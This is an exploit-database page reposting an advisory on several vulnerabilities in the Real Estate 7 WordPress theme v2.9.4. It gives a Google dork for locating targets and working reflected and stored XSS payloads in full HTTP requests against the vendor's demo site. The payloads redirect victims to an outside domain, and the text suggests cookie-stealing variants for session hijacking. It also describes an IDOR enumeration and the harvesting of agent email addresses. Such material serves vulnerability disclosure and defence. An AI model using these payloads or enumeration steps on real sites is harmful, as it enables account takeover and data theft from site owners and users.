Advertisement






Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities

CVE Category Price Severity
CVE-2021-27948 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-13
CPE
cpe:cpe:/a:wordpress:real_estate_7:2.9.4
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010103

Below is a copy:

Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities
# Exploit Title: Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/realestate-7/
# Date: 12/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://contempothemes.com/
# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
# Version: 2.9.4
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 200, 319


----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng


----[]- Persistent XSS -> Agent Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable textarea: Agent Testimonials (checkbox on Show on Agents Page is required).

Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"

Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"

agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"

Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"


-----------------------------17074317185520
Content-Disposition: form-data; name="description"


-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"

yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"


-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"

6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"

6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"

Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"

123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"

<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"


-----------------------------17074317185520
Content-Disposition: form-data; name="office"

6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"

101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"

San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"

CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"

92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"

Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"

b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"

/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"

update-user
-----------------------------17074317185520--


----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It's self-XSS, but still.

Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: _your_cookies_here_

ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com


----[]- IDOR: -[]----
Parsing this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digits for the p parameter can lead you to some interesting results like this: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (with package name, order date and unique login/author name as a useful information).


----[]- Information Exposure: -[]----
Each agent profile page contains the Email link as a pop-up form trigger. This form contains hidden input field with agent unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />

Same result you can achieve by watching the source code of agent profile page (it's faster if you'll search in code for @ symbol from the bottom).

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.